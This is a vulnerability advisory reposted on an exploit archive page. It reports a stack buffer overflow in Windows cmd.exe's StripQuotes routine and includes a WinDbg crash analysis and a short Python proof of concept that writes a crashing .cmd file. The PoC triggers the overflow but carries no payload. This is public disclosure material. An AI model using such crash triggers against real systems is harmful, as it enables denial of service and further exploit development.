exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows cmd.exe Stack Buffer Overflow

Microsoft Windows cmd.exe Stack Buffer Overflow
Posted Sep 16, 2021
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Microsoft Windows cmd.exe suffers from a stack buffer overflow vulnerability.

tags | exploit, overflow
systems | windows
SHA-256 | c0c6e1e6e941a667fff8d2e3a59cb00e4f436bf4e75ed0004cb71c6091fe1a0f

Microsoft Windows cmd.exe Stack Buffer Overflow

Change Mirror Download
[+] Credits: John Page (aka hyp3rlinx, malvuln)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com


[Product]
cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.


[Vulnerability Type]
Stack Buffer Overflow


[CVE Reference]
N/A


[Security Issue]
Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition.

E.g. cmd.exe /c <PAYLOAD>.

[Memory Dump]
(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
00007ffb`00a809d4 c3 ret


0:000> .ecxr
rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000
r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
r14=000002e34d796890 r15=000000000000200d
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
cmd!StripQuotes+0xa8:
00007ff7`c0e214f8 cc int 3

0:000> !analyze -v
*******************************************************************************
* *

* Exception Analysis *

* *
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3


EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
ExceptionCode: c0000409 (Stack buffer overflow)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000008

PROCESS_NAME: cmd.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1: 0000000000000008

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000000000012d4

BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE

PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4

STACK_TEXT:
000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

FOLLOWUP_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc int 3

SYMBOL_STACK_INDEX: 8

SYMBOL_NAME: cmd!StripQuotes+a8

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: cmd

IMAGE_NAME: cmd.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 0

STACK_COMMAND: ~0s ; kb

FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes

BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8


[Exploit/POC]
PAYLOAD=chr(235) + "\\CC"
PAYLOAD = PAYLOAD * 3000

with open("hate.cmd", "w") as f:
f.write(PAYLOAD)


[Network Access]
Local


[Video PoC URL]
https://www.youtube.com/watch?v=wYYgjV-PzD8


[Severity]
Low


[Disclosure Timeline]
Vendor Notification: Requires running dangerous file types already.

September 15, 2021 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close